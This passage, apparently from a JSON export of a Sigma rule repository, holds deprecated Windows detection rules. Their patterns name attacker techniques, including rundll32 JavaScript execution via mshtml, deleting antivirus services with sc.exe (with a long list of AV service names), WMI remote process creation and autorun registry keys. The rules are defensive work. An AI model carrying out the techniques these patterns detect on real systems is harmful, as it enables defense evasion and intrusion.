/r localMachine root /all\n        CommandLine|contains|all:\n            - '/add'\n            - 'root'\n    condition: selection1 or selection2\nfalsepositives:\n    - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_run_from_zip.yml",
    "content": "title: Run from a Zip File\nid: 1a70042a-6622-4a2b-8958-267625349abf\nstatus: deprecated\ndescription: Payloads may be compressed, archived, or encrypted in order to avoid detection\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file\nauthor: frack113\ndate: 2021/12/26\nmodified: 2023/03/05\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains: '.zip\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_rundll32_js_runhtmlapplication.yml",
    "content": "title: Rundll32 JS RunHTMLApplication Pattern\nid: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3\nstatus: deprecated\ndescription: Detects suspicious command line patterns used when rundll32 is used to run JavaScript code\nreferences:\n    - http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt\n    - https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-14\nmodified: 2024-02-23\ntags:\n    - attack.defense_evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains|all:\n            - 'rundll32'\n            - 'javascript'\n            - '..\\..\\mshtml,'\n            - 'RunHTMLApplication'\n    selection2:\n        CommandLine|contains: ';document.write();GetObject(\"script'\n    condition: 1 of selection*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_rundll32_script_run.yml",
    "content": "title: Suspicious Rundll32 Script in CommandLine\nid: 73fcad2e-ff14-4c38-b11d-4172c8ac86c7\nstatus: deprecated\ndescription: Detects suspicious process related to rundll32 based on arguments\nreferences:\n    - https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52\n    - https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md\nauthor: frack113, Zaw Min Htun (ZETA)\ndate: 2021/12/04\nmodified: 2024/02/23\ntags:\n    - attack.defense_evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains: 'rundll32'\n    selection2:\n        CommandLine|contains:\n            - 'mshtml,RunHTMLApplication'\n            - 'mshtml,#135'\n    selection3:\n        CommandLine|contains:\n            - 'javascript:'\n            - 'vbscript:'\n    condition: all of selection*\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_sc_delete_av_services.yml",
    "content": "title: Suspicious Execution of Sc to Delete AV Services\nid: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b\nstatus: deprecated\ndescription: Detects when attackers use \"sc.exe\" to delete AV services from the system in order to avoid detection\nreferences:\n    - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022/08/01\nmodified: 2023/03/04\ntags:\n    - attack.execution\n    - attack.defense_evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_cli:\n        CommandLine|contains: ' delete '\n    selection_av_process:\n        CommandLine|contains:\n            # Delete Service 'AVG'\n            - 'AvgAdminServer'\n            - 'AVG Antivirus'\n            - 'MBEndpointAgent'\n            # Delete Service 'Malwarebytes'\n            - 'MBAMService'\n            - 'MBCloudEA'\n            - 'avgAdminClient'\n            # Delete Service 'Sophos'\n            - 'SAVService'\n            - 'SAVAdminService'\n            - 'Sophos AutoUpdate Service'\n            - 'Sophos Clean Service'\n            - 'Sophos Device Control Service'\n            - 'Sophos File Scanner Service'\n            - 'Sophos Health Service'\n            - 'Sophos MCS Agent'\n            - 'Sophos MCS Client'\n            - 'SntpService'\n            - 'swc_service'\n            - 'swi_service'\n            - 'Sophos UI'\n            - 'swi_update'\n            - 'Sophos Web Control Service'\n            - 'Sophos System Protection Service'\n            - 'Sophos Safestore Service'\n            - 'hmpalertsvc'\n            - 'RpcEptMapper'\n            - 'Sophos Endpoint Defense Service'\n            - 'SophosFIM'\n            - 'swi_filter'\n            # Delete Service 'FireBird'\n            - 'FirebirdGuardianDefaultInstance'\n            - 'FirebirdServerDefaultInstance'\n            # Delete Service 'Webroot'\n            - 'WRSVC'\n            # Delete Service 'ESET'\n            - 'ekrn'\n            - 'ekrnEpsw'\n            # Delete Service 'Kaspersky'\n            - 'klim6'\n            - 'AVP18.0.0'\n            - 'KLIF'\n            - 'klpd'\n            - 'klflt'\n            - 'klbackupdisk'\n            - 'klbackupflt'\n            - 'klkbdflt'\n            - 'klmouflt'\n            - 'klhk'\n            - 'KSDE1.0.0'\n            - 'kltap'\n            # Delete Service 'Quick Heal'\n            - 'ScSecSvc'\n            - 'Core Mail Protection'\n            - 'Core Scanning Server'\n            - 'Core Scanning ServerEx'\n            - 'Online Protection System'\n            - 'RepairService'\n            - 'Core Browsing Protection'\n            - 'Quick Update Service'\n            # Delete Service 'McAfee'\n            - 'McAfeeFramework'\n            - 'macmnsvc'\n            - 'masvc'\n            - 'mfemms'\n            - 'mfevtp'\n            # Delete Service 'Trend Micro'\n            - 'TmFilter'\n            - 'TMLWCSService'\n            - 'tmusa'\n            - 'TmPreFilter'\n            - 'TMSmartRelayService'\n            - 'TMiCRCScanService'\n            - 'VSApiNt'\n            - 'TmCCSF'\n            - 'tmlisten'\n            - 'TmProxy'\n            - 'ntrtscan'\n            - 'ofcservice'\n            - 'TmPfw'\n            - 'PccNTUpd'\n            # Delete Service 'Panda'\n            - 'PandaAetherAgent'\n            - 'PSUAService'\n            - 'NanoServiceMain'\n            - 'EPIntegrationService'\n            - 'EPProtectedService'\n            - 'EPRedline'\n            - 'EPSecurityService'\n            - 'EPUpdateService'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such)\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_schtasks_user_temp.yml",
    "content": "title: Suspicious Add Scheduled Task From User AppData Temp\nid: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8\nstatus: deprecated\ndescription: schtasks.exe create task from user AppData\\Local\\Temp\nreferences:\n    - malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04\nauthor: frack113\ndate: 2021/11/03\nmodified: 2023/03/14\ntags:\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    schtasks:\n        Image|endswith: '\\schtasks.exe'\n    option:\n        CommandLine|contains|all:\n            - '/Create '\n            - '\\AppData\\Local\\Temp'\n    filter_klite_codec:\n        CommandLine|contains|all:\n            - '/Create /TN \"klcp_update\" /XML '\n            - '\\klcp_update_task.xml'\n    condition: schtasks and option and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_service_stop.yml",
    "content": "title: Stop Windows Service\nid: eb87818d-db5d-49cc-a987-d5da331fbd90\nstatus: deprecated\ndescription: Detects a Windows service to be stopped\nauthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali\ndate: 2019/10/23\nmodified: 2023/03/05\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sc_net_img:\n        - OriginalFileName:\n            - 'sc.exe'\n            - 'net.exe'\n            - 'net1.exe'\n        - Image|endswith:\n            - '\\sc.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n    selection_sc_net_cli:\n        CommandLine|contains: ' stop '\n    selection_pwsh:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains: 'Stop-Service '\n    filter:\n        CommandLine:\n             - 'sc  stop KSCWebConsoleMessageQueue' # kaspersky Security Center Web Console double space between sc and stop\n             - 'sc  stop LGHUBUpdaterService' # Logitech LGHUB Updater Service\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: (all of selection_sc_net* and not filter) or selection_pwsh\nfields:\n    - ComputerName\n    - User\n    - CommandLine\nfalsepositives:\n    - Administrator shutting down the service due to upgrade or removal purposes\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_susp_bitstransfer.yml",
    "content": "title: Suspicious Bitstransfer via PowerShell\nid: cd5c8085-4070-4e22-908d-a5b3342deb74\nstatus: deprecated\ndescription: Detects transferring files from system on a server bitstransfer Powershell cmdlets\nreferences:\n    - https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps\nauthor: Austin Songer @austinsonger\ndate: 2021/08/19\nmodified: 2023/01/10\ntags:\n    - attack.exfiltration\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - 'Get-BitsTransfer'\n            - 'Add-BitsFile'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_susp_cmd_exectution_via_wmi.yml",
    "content": "title: Suspicious Cmd Execution via WMI\nid: e31f89f7-36fb-4697-8ab6-48823708353b\nstatus: deprecated\ndescription: Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html\nauthor: Tim Rauch\ndate: 2022/09/27\nmodified: 2023/01/19\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cmd.exe'\n        ParentImage|endswith: '\\WmiPrvSE.exe'\n        CommandLine|contains: '\\\\\\\\127.0.0.1\\\\'\n    selection_opt:\n        CommandLine|contains:\n            - '2>&1'\n            - '1>'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_susp_commandline_chars.yml",
    "content": "title: Suspicious Characters in CommandLine\nid: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9\nstatus: deprecated\ndescription: Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion\nreferences:\n    - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/04/27\nmodified: 2023/03/03\ntags:\n    - attack.defense_evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_spacing_modifiers:\n        CommandLine|contains: # spacing modifier letters that get auto-replaced\n            - 'ˣ' # 0x02E3\n            - '˪' # 0x02EA\n            - 'ˢ' # 0x02E2\n    selection_unicode_slashes: # forward slash alternatives\n        CommandLine|contains:\n            - '∕' # 0x22FF\n            - '⁄' # 0x206F\n    selection_unicode_hyphens: # hyphen alternatives\n        CommandLine|contains:\n            - '―' # 0x2015\n            - '—' # 0x2014\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_susp_lolbin_non_c_drive.yml",
    "content": "title: Wscript Execution from Non C Drive\nid: 5b80cf53-3a46-4adc-960b-05ec19348d74\nstatus: deprecated\ndescription: Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.\nreferences:\n    - https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt\n    - https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/\nauthor: Aaron Herman\ndate: 2022/10/01\nmodified: 2023/08/29\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_lolbin:\n        Image|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n    selection_exetensions:\n        CommandLine|contains:\n            - '.js'\n            - '.vbs'\n            - '.vbe'\n    selection_drive_path:\n        CommandLine|contains: ':\\'\n    filter_drive_path:\n        CommandLine|contains:\n            - ' C:\\\\'\n            - \" 'C:\\\\\"\n            - ' \"C:\\\\'\n    filter_env_vars:\n        CommandLine|contains: '%'\n    filter_unc_paths:\n        CommandLine|contains: ' \\\\\\\\'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Legitimate scripts located on other partitions such as \"D:\"\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_susp_run_folder.yml",
    "content": "title: Process Start From Suspicious Folder\nid: dca91cfd-d7ab-4c66-8da7-ee57d487b35b\nstatus: deprecated\ndescription: Detects process start from rare or uncommon folders like temporary folder or folders that usually don't contain executable files\nreferences:\n    - Malware sandbox results\nauthor: frack113\ndate: 2022/02/11\nmodified: 2022/11/03\ntags:\n    - attack.execution\n    - attack.t1204\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - '\\Desktop\\'\n            - '\\Temp\\'\n            - '\\Temporary Internet'\n    filter_parent:\n        - ParentImage:\n            - 'C:\\Windows\\System32\\cleanmgr.exe'\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\Installer\\resources\\app\\ServiceHub\\Services\\Microsoft.VisualStudio.Setup.Service\\BackgroundDownload.exe'\n            - 'C:\\Windows\\System32\\dxgiadaptercache.exe'\n        - ParentImage|startswith: 'C:\\Program Files (x86)\\NVIDIA Corporation\\'\n    filter_other:\n        Image|endswith: 'setup.exe'  # the missing \\ at the beginning is intended - to cover e.g. MySoftwareSetup.exe as well\n    filter_edge:\n        Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\Temp\\'\n        Image|endswith: '.tmp\\MicrosoftEdgeUpdate.exe'\n        #OriginalFileName: msedgeupdate.dll\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Installers are expected to be run from the \"AppData\\Local\\Temp\" and \"C:\\Windows\\Temp\\\" directories\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_susp_squirrel_lolbin.yml",
    "content": "title: Squirrel Lolbin\nid: fa4b21c9-0057-4493-b289-2556416ae4d7\nstatus: deprecated\ndescription: Detects Possible Squirrel Packages Manager as Lolbin\nreferences:\n    - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/\n    - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/\nauthor: Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community\ndate: 2019/11/12\nmodified: 2023/02/14\ntags:\n    - attack.execution\n    - attack.defense_evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        Image|endswith: '\\update.exe'\n    selection2:\n        CommandLine|contains:\n            - '--processStart'\n            - '--processStartAndWait'\n            - '--createShortcut'\n    filter_discord:\n        CommandLine|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\Discord\\Update.exe'\n            - ' --processStart'\n            - 'Discord.exe'\n    filter_github_desktop:\n        CommandLine|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\GitHubDesktop\\Update.exe'\n            - 'GitHubDesktop.exe'\n        CommandLine|contains:\n            - '--createShortcut'\n            - '--processStartAndWait'\n    filter_teams:\n        CommandLine|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\Microsoft\\Teams\\Update.exe'\n            - 'Teams.exe'\n        CommandLine|contains:\n            - '--processStart'\n            - '--createShortcut'\n    condition: all of selection* and not 1 of filter_*\nfalsepositives:\n    - 1Clipboard\n    - Beaker Browser\n    - Caret\n    - Collectie\n    - Discord\n    - Figma\n    - Flow\n    - Ghost\n    - GitHub Desktop\n    - GitKraken\n    - Hyper\n    - Insomnia\n    - JIBO\n    - Kap\n    - Kitematic\n    - Now Desktop\n    - Postman\n    - PostmanCanary\n    - Rambox\n    - Simplenote\n    - Skype\n    - Slack\n    - SourceTree\n    - Stride\n    - Svgsus\n    - WebTorrent\n    - WhatsApp\n    - WordPress.com\n    - Atom\n    - Gitkraken\n    - Slack\n    - Teams\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_sysinternals_psexec_service_execution.yml",
    "content": "title: PsExec Tool Execution\nid: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba\nrelated:\n    - id: 42c575ea-e41e-41f1-b248-8093c3e82a28\n      type: derived\nstatus: deprecated\ndescription: Detects PsExec service execution via default service image name\nreferences:\n    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet\nauthor: Thomas Patzke\ndate: 2017/06/12\nmodified: 2023/02/28\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\PSEXESVC.exe'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: selection\nfields:\n    - EventID\n    - CommandLine\n    - ParentCommandLine\n    - ServiceName\n    - ServiceFileName\n    - TargetFilename\n    - PipeName\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_sysinternals_psexesvc_start.yml",
    "content": "title: PsExec Service Start\nid: 3ede524d-21cc-472d-a3ce-d21b568d8db7\nstatus: deprecated\ndescription: Detects a PsExec service start\nauthor: Florian Roth (Nextron Systems)\ndate: 2018/03/13\nmodified: 2023/02/28\ntags:\n    - attack.execution\n    - attack.s0029\n    - attack.t1569.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine: C:\\Windows\\PSEXESVC.exe\n    condition: selection\nfalsepositives:\n    - Administrative activity\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_whoami_as_system.yml",
    "content": "title: Run Whoami as SYSTEM\nid: 80167ada-7a12-41ed-b8e9-aa47195c66a1\nstatus: deprecated\ndescription: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\nauthor: Teymur Kheirkhabarov, Florian Roth\ndate: 2019/10/23\nmodified: 2023/02/28\ntags:\n    - attack.privilege_escalation\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_user:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    selection_img:\n        - OriginalFileName: 'whoami.exe'\n        - Image|endswith: '\\whoami.exe'\n    condition: all of selection*\nfalsepositives:\n    - Possible name overlap with NT AUHTORITY substring to cover all languages\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_whoami_execution.yml",
    "content": "title: Whoami Utility Execution\nid: e28a5a99-da44-436d-b7a0-2afc20a5f413\nstatus: deprecated # Deprecated in favor of 502b42de-4306-40b4-9596-6f590c81f073\ndescription: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation\nreferences:\n    - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/\n    - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-08-13\nmodified: 2025-10-20\ntags:\n    - attack.discovery\n    - attack.t1033\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\whoami.exe'\n        - OriginalFileName: 'whoami.exe'\n    condition: selection\nfalsepositives:\n    - Admin activity\n    - Scripts and administrative tools used in the monitored environment\n    - Monitoring activity\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_winword_dll_load.yml",
    "content": "title: Winword.exe Loads Suspicious DLL\nid: 2621b3a6-3840-4810-ac14-a02426086171\nstatus: deprecated\ndescription: Detects Winword.exe loading a custom DLL using the /l flag\nauthor: Victor Sergeev, oscd.community\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/\ndate: 2020/10/09\nmodified: 2022/07/25\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\winword.exe'\n        CommandLine|contains: '/l'\n    condition: selection\nfields:\n    - CommandLine\nfalsepositives:\n    - Unknown\nlevel: medium\ntags:\n    - attack.defense_evasion\n    - attack.t1202\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_wmic_execution_via_office_process.yml",
    "content": "title: WMI Execution Via Office Process\nid: 518643ba-7d9c-4fa5-9f37-baed36059f6a\nrelated:\n    - id: e1693bc8-7168-4eab-8718-cdcaa68a1738\n      type: derived\n    - id: 438025f9-5856-4663-83f7-52f878a70a50\n      type: similar\nstatus: deprecated\ndescription: Initial execution of malicious document calls wmic to execute the file with regsvr32\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\nauthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)\ndate: 2021/08/23\nmodified: 2023/02/04\ntags:\n    - attack.t1204.002\n    - attack.t1047\n    - attack.t1218.010\n    - attack.execution\n    - attack.defense_evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\wbem\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_parent:\n        ParentImage|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_wmic_remote_command.yml",
    "content": "title: WMI Remote Command Execution\nid: e42af9df-d90b-4306-b7fb-05c863847ebd\nstatus: deprecated\ndescription: An adversary might use WMI to execute commands on a remote system\nreferences:\n    - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/\n    - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nauthor: frack113\ndate: 2022/03/13\nmodified: 2023/02/14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/node:'\n            - 'process'\n            - 'call'\n            - 'create'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_wmic_remote_service.yml",
    "content": "title: WMI Reconnaissance List Remote Services\nid: 09af397b-c5eb-4811-b2bb-08b3de464ebf\nstatus: deprecated\ndescription: |\n    An adversary might use WMI to check if a certain Remote Service is running on a remote device.\n    When the test completes, a service information will be displayed on the screen if it exists.\n    A common feedback message is that \"No instance(s) Available\" if the service queried is not running.\n    A common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md\n    - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nauthor: frack113\ndate: 2022/01/01\nmodified: 2023/02/14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/node:'\n            - 'service'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_wuauclt_execution.yml",
    "content": "title: Windows Update Client LOLBIN\nid: d7825193-b70a-48a4-b992-8b5b3015cc11\nstatus: deprecated\ndescription: Detects code execution via the Windows Update client (wuauclt)\nreferences:\n    - https://dtm.uk/wuauclt/\nauthor: FPT.EagleEye Team\ndate: 2020/10/17\nmodified: 2023/11/11\ntags:\n    - attack.command_and_control\n    - attack.defense_evasion\n    - attack.t1105\n    - attack.t1218\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\wuauclt.exe'\n        - OriginalFileName: 'wuauclt.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/UpdateDeploymentProvider'\n            - '/RunHandlerComServer'\n            - '.dll'\n    filter:\n        CommandLine|contains:\n            - ' /ClassId '\n            - ' wuaueng.dll '\n    condition: all of selection* and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/process_creation_syncappvpublishingserver_exe.yml",
    "content": "title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction\nid: fde7929d-8beb-4a4c-b922-be9974671667\ndescription: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\nauthor: 'Ensar Şamil, @sblmsrsn, OSCD Community'\ndate: 2020/10/05\nmodified: 2022/04/11\ntags:\n    - attack.defense_evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '\\SyncAppvPublishingServer.exe'\n    condition: selection\nfalsepositives:\n    - App-V clients\nlevel: medium\nstatus: deprecated"
  },
  {
    "path": "deprecated/windows/registry_add_sysinternals_sdelete_registry_keys.yml",
    "content": "title: Sysinternals SDelete Registry Keys\nid: 9841b233-8df8-4ad7-9133-b0b4402a9014\nstatus: deprecated\ndescription: A General detection to trigger for the creation or modification of .*\\Software\\Sysinternals\\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/9\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020/05/02\nmodified: 2023/02/07\ntags:\n    - attack.defense_evasion\n    - attack.t1070.004\nlogsource:\n    product: windows\n    category: registry_add\ndetection:\n    selection:\n        EventType: CreateKey\n        TargetObject|contains: '\\Software\\Sysinternals\\SDelete'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/registry_event_asep_reg_keys_modification.yml",
    "content": "title: Autorun Keys Modification\nid: 17f878b8-9968-4578-b814-c4217fc5768c\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nstatus: deprecated\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\ndate: 2019/10/25\nmodified: 2022/05/14\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton\nlogsource:\n    category: registry_event\n    product: windows\nlevel: medium\ndetection:\n    main_selection:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows CE Services\\AutoStart'\n            - '\\Software\\Wow6432Node\\Microsoft\\Command Processor\\Autorun'\n            - '\\SOFTWARE\\Wow6432Node\\Microsoft\\Active Setup\\Installed Components'\n            - '\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnDisconnect'\n            - '\\SOFTWARE\\Microsoft\\Windows CE Services\\AutoStartOnConnect'\n            - '\\SYSTEM\\Setup\\CmdLine'\n            - '\\Software\\Microsoft\\Ctf\\LangBarAddin'\n            - '\\Software\\Microsoft\\Command Processor\\Autorun'\n            - '\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components'\n            - '\\SOFTWARE\\Classes\\Protocols\\Handler'\n            - '\\SOFTWARE\\Classes\\Protocols\\Filter'\n            - '\\SOFTWARE\\Classes\\Htmlfile\\Shell\\Open\\Command\\(Default)'\n            - '\\Environment\\UserInitMprLogonScript'\n            - '\\SOFTWARE\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop\\Scrnsave.exe'\n            - '\\Software\\Microsoft\\Internet Explorer\\UrlSearchHooks'\n            - '\\SOFTWARE\\Microsoft\\Internet Explorer\\Desktop\\Components'\n            - '\\Software\\Classes\\Clsid\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\Inprocserver32'\n            - '\\Control Panel\\Desktop\\Scrnsave.exe'\n    session_manager_base:\n        